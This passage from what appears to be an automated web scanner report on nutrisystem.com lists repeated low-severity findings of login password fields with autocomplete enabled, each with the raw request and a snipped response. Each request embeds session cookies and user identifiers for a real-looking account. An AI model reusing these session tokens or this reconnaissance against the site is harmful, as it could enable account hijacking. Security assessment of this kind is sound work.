<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/faq/index.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

7.23. http://www.nutrisystem.com/jsps_hmr/giftcards/giftcard_selection_page.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/giftcards/giftcard_selection_page.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/giftcards/giftcard_selection_page.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 12 Jan 2011 04:07:46 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html class="dj_gecko dj_ff3 dj_contentbox">
<head>
<meta http-equiv="Content-Type" con
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/giftcards/giftcard_selection_page.jsp.login" name="login" method="post" id="loginForm"><input value="ISO-8859-1" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

7.24. http://www.nutrisystem.com/jsps_hmr/guarantee/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/guarantee/index.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/guarantee/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" c
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/guarantee/index.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

7.25. http://www.nutrisystem.com/jsps_hmr/help/contact.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/help/contact.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/help/contact.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 12 Jan 2011 04:07:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Content-Type"
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/help/contact.jsp.login" name="login" method="post" id="loginForm"><input value="ISO-8859-1" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

7.26. http://www.nutrisystem.com/jsps_hmr/help/site_map.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/help/site_map.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/help/site_map.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 12 Jan 2011 04:07:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Content-Type"
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/help/site_map.jsp.login" name="login" method="post" id="loginForm"><input value="ISO-8859-1" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

7.27. http://www.nutrisystem.com/jsps_hmr/home/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/home/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/home/ HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 03:15:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Compatibl
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/home/.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

7.28. http://www.nutrisystem.com/jsps_hmr/home/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/home/index.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/home/index.jsp?_requestid=566196 HTTP/1.1
Host: www.nutrisystem.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; DYN_USER_ID=242836360; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; NSOfmCookieMarker=include

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: NSOfmCookieMarker=exclude; Domain=.nutrisystem.com; Expires=Fri, 11-Jan-2013 02:48:28 GMT; Path=/
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 02:48:28 GMT
Content-Length: 67789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Compatibl
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/home/index.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

7.29. http://www.nutrisystem.com/jsps_hmr/how_it_works/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/how_it_works/index.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/how_it_works/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
   <!-- Defect #671 - Need to inclu
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/how_it_works/index.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

7.30. http://www.nutrisystem.com/jsps_hmr/privacy/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/privacy/index.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/privacy/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" con
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/privacy/index.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

7.31. http://www.nutrisystem.com/jsps_hmr/product-pages/diabetic_overview.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/product-pages/diabetic_overview.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/product-pages/diabetic_overview.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<script type="text/javascript" src='/js/foresee/foresee-trigger.js'></script>
   <script t
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/product-pages/diabetic_overview.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

7.32. http://www.nutrisystem.com/jsps_hmr/product-pages/mens_overview.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/product-pages/mens_overview.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/product-pages/mens_overview.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
   <meta http-equiv="P3P" content='
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/product-pages/mens_overview.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

7.33. http://www.nutrisystem.com/jsps_hmr/product-pages/womens_overview.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/product-pages/womens_overview.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/product-pages/womens_overview.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; 